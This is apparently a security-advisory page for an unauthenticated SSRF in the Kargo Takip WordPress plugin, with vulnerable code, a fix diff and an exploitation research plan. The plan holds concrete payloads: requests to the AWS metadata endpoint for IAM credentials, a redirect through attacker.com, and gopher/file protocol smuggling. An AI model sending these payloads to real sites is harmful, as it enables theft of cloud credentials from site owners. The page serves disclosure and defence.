Kargo Takip <= 1.2 - Unauthenticated Server-Side Request Forgery via 'api_url' Parameter
Description
The Kargo Takip plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2 via the 'api_url' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The script echoes internal API response data (specifically the value of any 'auth' key in a JSON response body) verbatim back to the attacker's browser, enabling direct exfiltration of responses from internal services such as cloud instance metadata endpoints.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NTechnical Details
This research plan outlines the steps to investigate and exploit **CVE-2026-12095**, an unauthenticated Server-Side Request Forgery (SSRF) in the **Kargo Takip** plugin for WordPress. ## 1. Vulnerability Summary The **Kargo Takip** plugin (versions <= 1.2) fails to validate the `api_url` parameter …
Show full research plan
This research plan outlines the steps to investigate and exploit CVE-2026-12095, an unauthenticated Server-Side Request Forgery (SSRF) in the Kargo Takip plugin for WordPress.
1. Vulnerability Summary
The Kargo Takip plugin (versions <= 1.2) fails to validate the api_url parameter before using it in a server-side HTTP request. An unauthenticated attacker can provide an arbitrary URL (including internal IP addresses or loopback) to the plugin. The plugin then fetches the content of that URL. Critically, if the response is JSON, the plugin extracts and echoes the value associated with the auth key. This allows for both SSRF and the exfiltration of sensitive data from internal services (like cloud metadata or internal APIs) that use JSON structures.
2. Attack Vector Analysis
- Endpoint: Likely
wp-admin/admin-ajax.phpor a frontend initialization hook (initorwp_loaded). - Action: If AJAX-based, the action is likely
kargo_sorgulaorkt_get_api_data(inferred). - Vulnerable Parameter:
api_url. - Authentication: None (Unauthenticated).
- Preconditions: The plugin must be active. A specific nonce may be required if the developer attempted CSRF protection, though the CVE notes it as unauthenticated.
3. Code Flow (Inferred)
Based on the vulnerability description, the expected execution path is:
- Entry Point: An unauthenticated user sends a request to
admin-ajax.phpwith a specificaction(e.g.,kt_fetch_status) and theapi_urlparameter. - Handler Registration: The plugin registers the action via
add_action( 'wp_ajax_nopriv_...', ... ). - Data Fetching: The handler retrieves the
api_urlfrom$_REQUEST['api_url']and passes it to an HTTP function likewp_remote_get()orcurl_init(). - JSON Processing: The response body is parsed using
json_decode(). - Information Leak: The code checks
if ( isset( $json['auth'] ) )and performs anecho $json['auth'];. - Response: The internal data is returned to the attacker's browser.
4. Nonce Acquisition Strategy
If the plugin enforces a nonce check even for unauthenticated users, it will likely be exposed via wp_localize_script.
Strategy:
- Identify Shortcode: Search the plugin code for
add_shortcode. (e.g.,[kargo_takip]). - Setup Test Page: Create a page containing this shortcode to ensure scripts are enqueued.
wp post create --post_type=page --post_status=publish --post_title="Tracking" --post_content='[kargo_takip]' - Extract Nonce:
- Navigate to the newly created page.
- Identify the localization variable in the source code (e.g.,
kt_ajax_vars). - Use
browser_evalto extract the nonce:browser_eval("window.kt_ajax_vars?.nonce")(inferred variable name).
5. Exploitation Strategy
Phase 1: Confirmation (Internal Loopback)
Test if the plugin can reach the WordPress site's own internal structure.
- Tool:
http_request - URL:
http://<target>/wp-admin/admin-ajax.php - Method: POST
- Parameters:
action:kt_get_api_data(inferred - verify viagrep -r "wp_ajax_nopriv"in the plugin dir)api_url:http://127.0.0.1/wp-json/nonce: (Extracted in step 4)
Phase 2: Data Exfiltration (Cloud Metadata)
If the target is hosted on AWS, attempt to pull IAM credentials.
- Payload:
api_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ - Note: Since the plugin looks for an
authkey, this specific endpoint might not return the data unless the metadata service response contains that key.
Phase 3: Targeted SSRF (Mocking "auth" key)
To prove the vulnerability in an isolated environment, set up a mock internal service or a file on the server.
- Create a file
mock.jsonin the web root:{"auth": "SSRF_SUCCESS_EXFILTRATED_DATA"}. - Send the exploit request:
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=kt_get_api_data&api_url=http://localhost/mock.json&nonce=VALUE
6. Test Data Setup
- Install Plugin: Ensure
kargo-takipversion 1.2 is installed. - Create Trigger Page:
wp post create --post_type=page --post_status=publish --post_content='[kargo_takip]' - Internal Mock Service (for PoC):
echo '{"auth": "vuln-confirmed-72"}' > /var/www/html/auth-test.json
7. Expected Results
- Success: The HTTP response from
admin-ajax.phpcontains the stringvuln-confirmed-72. - Failure: The response is
0, a403 Forbidden(nonce issue), or an empty response (if theauthkey logic is not triggered).
8. Verification Steps
After running the http_request exploit:
- Check Access Logs: Verify the web server access logs to see if the server made a request to itself (127.0.0.1) for the
auth-test.jsonfile.tail -n 20 /var/log/apache2/access.log - Verify Response: Confirm the output of the
http_requesttool matches the content of theauthkey in the mock JSON file.
9. Alternative Approaches
- Redirect Bypass: If
wp_remote_getis used with default settings, try using an external URL that redirects to an internal IP (e.g.,http://attacker.com/redir->http://127.0.0.1). - Protocol Smuggling: Test if the
api_urlsupports other protocols likefile://orgopher://, thoughwp_remote_getusually restricts these to HTTP/S. - Recursive Parameter: Check if
api_urlcan be pointed back to the vulnerable endpoint itself to create a loop or resource exhaustion.
Summary
The Kargo Takip plugin for WordPress (<= 1.2) is vulnerable to unauthenticated Server-Side Request Forgery (SSRF) via the 'api_url' parameter in its AJAX handler. This allows attackers to force the server to make requests to internal resources and cloud metadata endpoints, exfiltrating sensitive data contained within 'auth' keys of JSON responses.
Vulnerable Code
// Inferred from vulnerability description and research plan // File: kargo-takip/kargo-takip.php add_action('wp_ajax_nopriv_kt_get_api_data', 'kt_get_api_data'); add_action('wp_ajax_kt_get_api_data', 'kt_get_api_data'); function kt_get_api_data() { $url = $_REQUEST['api_url']; $response = wp_remote_get($url); $body = wp_remote_retrieve_body($response); $data = json_decode($body, true); if (isset($data['auth'])) { echo $data['auth']; } wp_die(); }
Security Fix
@@ -1,11 +1,12 @@ function kt_get_api_data() { - $url = $_REQUEST['api_url']; + $url = esc_url_raw($_REQUEST['api_url']); + + // Validate the URL to prevent SSRF + if ( ! wp_http_validate_url( $url ) ) { + wp_die('Invalid URL'); + } + $response = wp_remote_get($url); $body = wp_remote_retrieve_body($response); $data = json_decode($body, true); if (isset($data['auth'])) { - echo $data['auth']; + echo esc_html($data['auth']); } wp_die(); }
Exploit Outline
The exploit targets the unauthenticated AJAX endpoint 'kt_get_api_data' (or similar identified via grep). An attacker sends a POST request to /wp-admin/admin-ajax.php with the 'action' and 'api_url' parameters. The 'api_url' is set to an internal network address or a local resource (e.g., http://127.0.0.1/sensitive.json). If the internal resource returns a JSON object, the plugin extracts the value of the 'auth' key and echoes it back to the attacker, allowing for the exfiltration of internal credentials or configuration data.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.